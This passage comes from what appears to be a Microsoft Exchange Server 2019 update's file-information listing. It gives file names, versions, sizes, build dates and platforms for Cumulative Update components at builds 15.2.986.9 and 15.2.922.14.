\nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.986.9| 60,296| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.986.9| 49,544| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.986.9| 33,144| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.986.9| 112,528| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.986.9| 18,312| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.986.9| 52,088| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.986.9| 672,136| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.986.9| 23,944| 29-Sep-21| 21:05| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.986.9| 17,784| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.986.9| 487,304| 29-Sep-21| 21:14| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.986.9| 12,680| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.986.9| 306,056| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.986.9| 15,752| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.986.9| 46,464| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.986.9| 1,044,352| 29-Sep-21| 21:18| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.986.9| 18,824| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.986.9| 18,808| 29-Sep-21| 21:19| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.986.9| 118,672| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.986.9| 924,536| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.986.9| 1,469,328| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.986.9| 32,648| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.986.9| 41,872| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.986.9| 24,976| 29-Sep-21| 20:35| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.986.9| 15,240| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.986.9| 83,344| 29-Sep-21| 21:36| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.986.9| 50,064| 29-Sep-21| 21:36| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.986.9| 658,832| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.986.9| 186,248| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.986.9| 67,472| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.986.9| 12,688| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.986.9| 56,720| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.986.9| 28,024| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.986.9| 120,720| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.986.9| 31,624| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.986.9| 57,208| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.986.9| 35,720| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.webservices.dll| 15.2.986.9| 1,054,088| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.986.9| 67,984| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.986.9| 23,440| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.986.9| 76,160| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.986.9| 17,272| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.986.9| 29,056| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.986.9| 505,232| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.986.9| 14,728| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.986.9| 36,744| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.986.9| 66,448| 29-Sep-21| 20:54| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.986.9| 19,320| 29-Sep-21| 19:44| x86 \nMicrosoft.filtering.dll| 15.2.986.9| 113,040| 29-Sep-21| 20:15| x86 \nMicrosoft.filtering.exchange.dll| 15.2.986.9| 57,224| 29-Sep-21| 21:07| x86 \nMicrosoft.filtering.interop.dll| 15.2.986.9| 15,240| 29-Sep-21| 20:15| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.986.9| 46,968| 29-Sep-21| 20:28| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.986.9| 15,760| 29-Sep-21| 19:47| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.986.9| 23,952| 29-Sep-21| 19:44| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.986.9| 22,392| 29-Sep-21| 19:44| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.986.9| 34,192| 29-Sep-21| 19:44| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,898| 29-Sep-21| 21:45| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,274| 29-Sep-21| 21:45| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.986.9| 1,518,984| 29-Sep-21| 22:22| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.986.9| 13,192| 29-Sep-21| 19:48| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.986.9| 33,144| 29-Sep-21| 22:05| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.986.9| 18,320| 29-Sep-21| 19:44| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.986.9| 45,968| 29-Sep-21| 21:07| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.986.9| 50,560| 29-Sep-21| 21:07| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.986.9| 72,592| 29-Sep-21| 19:58| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.986.9| 541,568| 29-Sep-21| 19:50| x86 \nMicrosoft.managementgui.dll| 15.2.986.9| 133,512| 29-Sep-21| 19:44| x86 \nMicrosoft.mce.interop.dll| 15.2.986.9| 24,440| 29-Sep-21| 19:44| x86 \nMicrosoft.office.audit.dll| 15.2.986.9| 124,808| 29-Sep-21| 19:44| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.986.9| 585,608| 29-Sep-21| 20:15| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.986.9| 42,384| 29-Sep-21| 19:58| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.986.9| 218,000| 29-Sep-21| 23:25| x86 \nMicrosoft.office.compliance.console.dll| 15.2.986.9| 854,928| 29-Sep-21| 23:36| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.986.9| 485,760| 29-Sep-21| 23:29| x86 \nMicrosoft.office.compliance.core.dll| 15.2.986.9| 412,048| 29-Sep-21| 20:02| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.986.9| 36,240| 29-Sep-21| 19:58| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.986.9| 85,392| 29-Sep-21| 21:04| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.986.9| 1,783,176| 29-Sep-21| 19:50| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.986.9| 49,528| 29-Sep-21| 21:04| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.986.9| 27,512| 29-Sep-21| 21:07| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.986.9| 174,984| 29-Sep-21| 20:02| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.986.9| 166,288| 29-Sep-21| 20:48| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.986.9| 40,328| 29-Sep-21| 19:44| x86 \nMicrosoft.online.box.shell.dll| 15.2.986.9| 46,480| 29-Sep-21| 19:44| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.986.9| 67,976| 29-Sep-21| 19:44| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.986.9| 67,976| 29-Sep-21| 19:44| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.986.9| 120,208| 29-Sep-21| 19:58| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,142| 29-Sep-21| 19:58| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,084| 29-Sep-21| 19:58| Not applicable \nMovemailbox.ps1| Not applicable| 61,180| 29-Sep-21| 19:58| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,622| 29-Sep-21| 19:58| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,552| 29-Sep-21| 19:58| Not applicable \nMpgearparser.dll| 15.2.986.9| 99,720| 29-Sep-21| 19:47| x64 \nMsclassificationadapter.dll| 15.2.986.9| 248,712| 29-Sep-21| 19:50| x64 \nMsexchangecompliance.exe| 15.2.986.9| 78,728| 29-Sep-21| 21:26| x86 \nMsexchangedagmgmt.exe| 15.2.986.9| 25,488| 29-Sep-21| 21:13| x86 \nMsexchangedelivery.exe| 15.2.986.9| 38,800| 29-Sep-21| 21:12| x86 \nMsexchangefrontendtransport.exe| 15.2.986.9| 31,624| 29-Sep-21| 21:06| x86 \nMsexchangehmhost.exe| 15.2.986.9| 27,016| 29-Sep-21| 22:23| x86 \nMsexchangehmrecovery.exe| 15.2.986.9| 29,568| 29-Sep-21| 20:48| x86 \nMsexchangemailboxassistants.exe| 15.2.986.9| 72,568| 29-Sep-21| 21:11| x86 \nMsexchangemailboxreplication.exe| 15.2.986.9| 20,880| 29-Sep-21| 21:22| x86 \nMsexchangemigrationworkflow.exe| 15.2.986.9| 69,520| 29-Sep-21| 21:25| x86 \nMsexchangerepl.exe| 15.2.986.9| 71,056| 29-Sep-21| 21:17| x86 \nMsexchangesubmission.exe| 15.2.986.9| 123,280| 29-Sep-21| 21:20| x86 \nMsexchangethrottling.exe| 15.2.986.9| 39,824| 29-Sep-21| 20:28| x86 \nMsexchangetransport.exe| 15.2.986.9| 74,128| 29-Sep-21| 20:28| x86 \nMsexchangetransportlogsearch.exe| 15.2.986.9| 139,152| 29-Sep-21| 21:07| x86 \nMsexchangewatchdog.exe| 15.2.986.9| 55,696| 29-Sep-21| 19:47| x64 \nMspatchlinterop.dll| 15.2.986.9| 53,648| 29-Sep-21| 19:52| x64 \nNativehttpproxy.dll| 15.2.986.9| 91,528| 29-Sep-21| 19:48| x64 \nNavigatorparser.dll| 15.2.986.9| 636,808| 29-Sep-21| 19:47| x64 \nNego2nativeinterface.dll| 15.2.986.9| 19,320| 29-Sep-21| 19:47| x64 \nNegotiateclientcertificatemodule.dll| 15.2.986.9| 30,088| 29-Sep-21| 19:47| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,764| 29-Sep-21| 19:58| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,599| 29-Sep-21| 19:58| Not applicable \nNtspxgen.dll| 15.2.986.9| 80,776| 29-Sep-21| 19:48| x64 \nOleconverter.exe| 15.2.986.9| 173,944| 29-Sep-21| 19:47| x64 \nOutsideinmodule.dll| 15.2.986.9| 87,936| 29-Sep-21| 19:50| x64 \nOwaauth.dll| 15.2.986.9| 92,040| 29-Sep-21| 19:48| x64 \nPerf_common_extrace.dll| 15.2.986.9| 245,136| 29-Sep-21| 19:44| x64 \nPerf_exchmem.dll| 15.2.986.9| 86,408| 29-Sep-21| 19:44| x64 \nPipeline2.dll| 15.2.986.9| 1,454,456| 29-Sep-21| 20:00| x64 \nPreparemoverequesthosting.ps1| Not applicable| 71,015| 29-Sep-21| 19:58| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,249| 29-Sep-21| 19:58| Not applicable \nProductinfo.managed.dll| 15.2.986.9| 27,016| 29-Sep-21| 19:44| x86 \nProxybinclientsstringsdll| 15.2.986.9| 924,552| 29-Sep-21| 19:47| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,258| 29-Sep-21| 19:58| Not applicable \nQuietexe.exe| 15.2.986.9| 14,720| 29-Sep-21| 19:47| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,564| 29-Sep-21| 19:52| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,655| 29-Sep-21| 21:41| Not applicable \nRemoteexchange.ps1| Not applicable| 23,569| 29-Sep-21| 21:46| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,704| 29-Sep-21| 19:58| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,022| 29-Sep-21| 19:58| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,032| 29-Sep-21| 19:59| Not applicable \nReplaycrimsonmsg.dll| 15.2.986.9| 1,104,768| 29-Sep-21| 19:44| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,476| 29-Sep-21| 21:41| Not applicable \nResetcasservice.ps1| Not applicable| 21,727| 29-Sep-21| 19:58| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,101| 29-Sep-21| 19:44| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,125| 29-Sep-21| 19:44| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,210| 29-Sep-21| 19:52| Not applicable \nRightsmanagementwrapper.dll| 15.2.986.9| 86,408| 29-Sep-21| 19:48| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 29-Sep-21| 19:58| Not applicable \nRpcperf.dll| 15.2.986.9| 23,432| 29-Sep-21| 19:47| x64 \nRpcproxyshim.dll| 15.2.986.9| 39,304| 29-Sep-21| 19:50| x64 \nRulesauditmsg.dll| 15.2.986.9| 12,664| 29-Sep-21| 19:50| x64 \nSafehtmlnativewrapper.dll| 15.2.986.9| 34,696| 29-Sep-21| 19:50| x64 \nScanenginetest.exe| 15.2.986.9| 956,280| 29-Sep-21| 19:52| x64 \nScanningprocess.exe| 15.2.986.9| 739,216| 29-Sep-21| 20:15| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,832| 29-Sep-21| 19:58| Not applicable \nServicecontrol.ps1| Not applicable| 52,313| 29-Sep-21| 19:44| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 29-Sep-21| 19:58| Not applicable \nSettingsadapter.dll| 15.2.986.9| 116,104| 29-Sep-21| 19:48| x64 \nSetup.exe| 15.2.986.9| 20,872| 29-Sep-21| 19:58| x86 \nSetupui.exe| 15.2.986.9| 188,304| 29-Sep-21| 21:40| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,209| 29-Sep-21| 19:58| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,847| 29-Sep-21| 19:52| Not applicable \nStatisticsutil.dll| 15.2.986.9| 142,208| 29-Sep-21| 19:50| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,133| 29-Sep-21| 19:52| Not applicable \nStoretsconstants.ps1| Not applicable| 15,850| 29-Sep-21| 19:52| Not applicable \nStoretslibrary.ps1| Not applicable| 28,023| 29-Sep-21| 19:52| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.986.9| 28,552| 29-Sep-21| 19:47| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,947| 29-Sep-21| 19:58| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,993| 29-Sep-21| 19:58| Not applicable \nTest_mitigationserviceconnectivity.ps1| Not applicable| 14,206| 29-Sep-21| 19:58| Not applicable \nTextconversionmodule.dll| 15.2.986.9| 86,400| 29-Sep-21| 19:50| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,747| 29-Sep-21| 19:52| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,453| 29-Sep-21| 19:52| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,049| 29-Sep-21| 19:52| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,473| 29-Sep-21| 19:44| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,050| 29-Sep-21| 19:58| Not applicable \nUpdatecas.ps1| Not applicable| 38,177| 29-Sep-21| 19:44| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,726| 29-Sep-21| 19:44| Not applicable \nUpdateserver.exe| 15.2.986.9| 3,014,536| 29-Sep-21| 19:58| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,176| 29-Sep-21| 19:58| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,045| 29-Sep-21| 23:22| Not applicable \nWsbexchange.exe| 15.2.986.9| 125,304| 29-Sep-21| 19:52| x64 \nX400prox.dll| 15.2.986.9| 103,304| 29-Sep-21| 19:47| x64 \n_search.lingoperators.a| 15.2.986.9| 34,680| 29-Sep-21| 20:54| Not applicable \n_search.lingoperators.b| 15.2.986.9| 34,680| 29-Sep-21| 20:54| Not applicable \n_search.mailboxoperators.a| 15.2.986.9| 290,192| 29-Sep-21| 21:17| Not applicable \n_search.mailboxoperators.b| 15.2.986.9| 290,192| 29-Sep-21| 21:17| Not applicable \n_search.operatorschema.a| 15.2.986.9| 485,768| 29-Sep-21| 20:48| Not applicable \n_search.operatorschema.b| 15.2.986.9| 485,768| 29-Sep-21| 20:48| Not applicable \n_search.tokenoperators.a| 15.2.986.9| 113,040| 29-Sep-21| 20:51| Not applicable \n_search.tokenoperators.b| 15.2.986.9| 113,040| 29-Sep-21| 20:51| Not applicable \n_search.transportoperators.a| 15.2.986.9| 67,984| 29-Sep-21| 21:22| Not applicable \n_search.transportoperators.b| 15.2.986.9| 67,984| 29-Sep-21| 21:22| Not applicable \n \n## \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 10\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.922.14| 71,032| 25-Sep-21| 2:11| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,538| 25-Sep-21| 2:12| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,937| 25-Sep-21| 2:27| Not applicable \nAdemodule.dll| 15.2.922.14| 106,376| 25-Sep-21| 2:13| x64 \nAirfilter.dll| 15.2.922.14| 42,888| 25-Sep-21| 2:12| x64 \nAjaxcontroltoolkit.dll| 15.2.922.14| 92,552| 25-Sep-21| 2:27| x86 \nAntispamcommon.ps1| Not applicable| 13,501| 25-Sep-21| 2:09| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 25-Sep-21| 2:12| Not applicable \nAsentirs.msi| Not applicable| 77,824| 25-Sep-21| 2:12| Not applicable \nAsentsig.msi| Not applicable| 73,728| 25-Sep-21| 2:15| Not applicable \nBigfunnel.bondtypes.dll| 15.2.922.14| 45,432| 25-Sep-21| 2:18| x86 \nBigfunnel.common.dll| 15.2.922.14| 66,440| 25-Sep-21| 2:09| x86 \nBigfunnel.configuration.dll| 15.2.922.14| 118,152| 25-Sep-21| 2:33| x86 \nBigfunnel.entropy.dll| 15.2.922.14| 44,432| 25-Sep-21| 2:13| x86 \nBigfunnel.filter.dll| 15.2.922.14| 54,160| 25-Sep-21| 2:18| x86 \nBigfunnel.indexstream.dll| 15.2.922.14| 69,000| 25-Sep-21| 2:28| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,136| 25-Sep-21| 2:09| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.922.14| 19,848| 25-Sep-21| 2:28| x86 \nBigfunnel.poi.dll| 15.2.922.14| 245,112| 25-Sep-21| 2:11| x86 \nBigfunnel.postinglist.dll| 15.2.922.14| 189,304| 25-Sep-21| 2:27| x86 \nBigfunnel.query.dll| 15.2.922.14| 101,264| 25-Sep-21| 2:09| x86 \nBigfunnel.ranking.dll| 15.2.922.14| 109,448| 25-Sep-21| 2:28| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.922.14| 3,634,568| 25-Sep-21| 2:27| x86 \nBigfunnel.tracing.dll| 15.2.922.14| 42,872| 25-Sep-21| 2:12| x86 \nBigfunnel.wordbreakers.dll| 15.2.922.14| 46,464| 25-Sep-21| 2:18| x86 \nCafe_airfilter_dll| 15.2.922.14| 42,888| 25-Sep-21| 2:12| x64 \nCafe_exppw_dll| 15.2.922.14| 83,336| 25-Sep-21| 2:12| x64 \nCafe_owaauth_dll| 15.2.922.14| 92,048| 25-Sep-21| 2:11| x64 \nCalcalculation.ps1| Not applicable| 42,121| 25-Sep-21| 2:09| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,618| 25-Sep-21| 2:28| Not applicable \nChksgfiles.dll| 15.2.922.14| 57,232| 25-Sep-21| 2:18| x64 \nCitsconstants.ps1| Not applicable| 15,837| 25-Sep-21| 2:18| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 25-Sep-21| 2:18| Not applicable \nCitstypes.ps1| Not applicable| 14,488| 25-Sep-21| 2:18| Not applicable \nClassificationengine_mce| 15.2.922.14| 1,693,056| 25-Sep-21| 2:12| Not applicable \nClusmsg.dll| 15.2.922.14| 134,016| 25-Sep-21| 2:13| x64 \nCoconet.dll| 15.2.922.14| 48,016| 25-Sep-21| 2:10| x64 \nCollectovermetrics.ps1| Not applicable| 81,640| 25-Sep-21| 2:27| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,882| 25-Sep-21| 2:27| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 25-Sep-21| 4:44| Not applicable \nComplianceauditservice.exe| 15.2.922.14| 39,800| 25-Sep-21| 4:46| x86 \nConfigureadam.ps1| Not applicable| 22,772| 25-Sep-21| 2:28| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,340| 25-Sep-21| 2:28| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,047| 25-Sep-21| 2:09| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,782| 25-Sep-21| 2:27| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,840| 25-Sep-21| 2:27| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,295| 25-Sep-21| 2:28| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 25-Sep-21| 4:44| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 25-Sep-21| 4:44| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,228| 25-Sep-21| 4:32| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,065| 25-Sep-21| 2:27| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,544| 25-Sep-21| 2:28| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,777| 25-Sep-21| 2:28| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,924| 25-Sep-21| 2:28| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts_exsmime.dll| 15.2.922.14| 380,808| 25-Sep-21| 2:10| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.922.14| 1,686,920| 25-Sep-21| 2:12| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 508| 25-Sep-21| 2:06| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:12| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:12| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:11| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:12| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:12| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.922.14| 12,672| 25-Sep-21| 2:11| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.922.14| 12,672| 25-Sep-21| 2:11| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.922.14| 12,672| 25-Sep-21| 2:12| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:11| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:10| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:11| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.922.14| 12,672| 25-Sep-21| 2:12| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.922.14| 12,688| 25-Sep-21| 2:12| x86 \nDagcommonlibrary.ps1| Not applicable| 60,222| 25-Sep-21| 2:27| Not applicable \nDependentassemblygenerator.exe| 15.2.922.14| 22,392| 25-Sep-21| 2:12| x86 \nDiaghelper.dll| 15.2.922.14| 66,952| 25-Sep-21| 2:09| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,366| 25-Sep-21| 2:18| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,374| 25-Sep-21| 2:28| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,201| 25-Sep-21| 2:28| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,666| 25-Sep-21| 2:27| Not applicable \nDisklockerapi.dll| Not applicable| 22,408| 25-Sep-21| 2:11| x64 \nDlmigrationmodule.psm1| Not applicable| 39,612| 25-Sep-21| 2:27| Not applicable \nDsaccessperf.dll| 15.2.922.14| 45,968| 25-Sep-21| 2:09| x64 \nDscperf.dll| 15.2.922.14| 32,648| 25-Sep-21| 2:11| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.922.14| 1,686,920| 25-Sep-21| 2:12| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.922.14| 601,480| 25-Sep-21| 2:40| x86 \nEcpperfcounters.xml| Not applicable| 31,180| 25-Sep-21| 2:12| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:13| x86 \nEdgetransport.exe| 15.2.922.14| 49,552| 25-Sep-21| 3:52| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 511| 25-Sep-21| 2:06| Not applicable 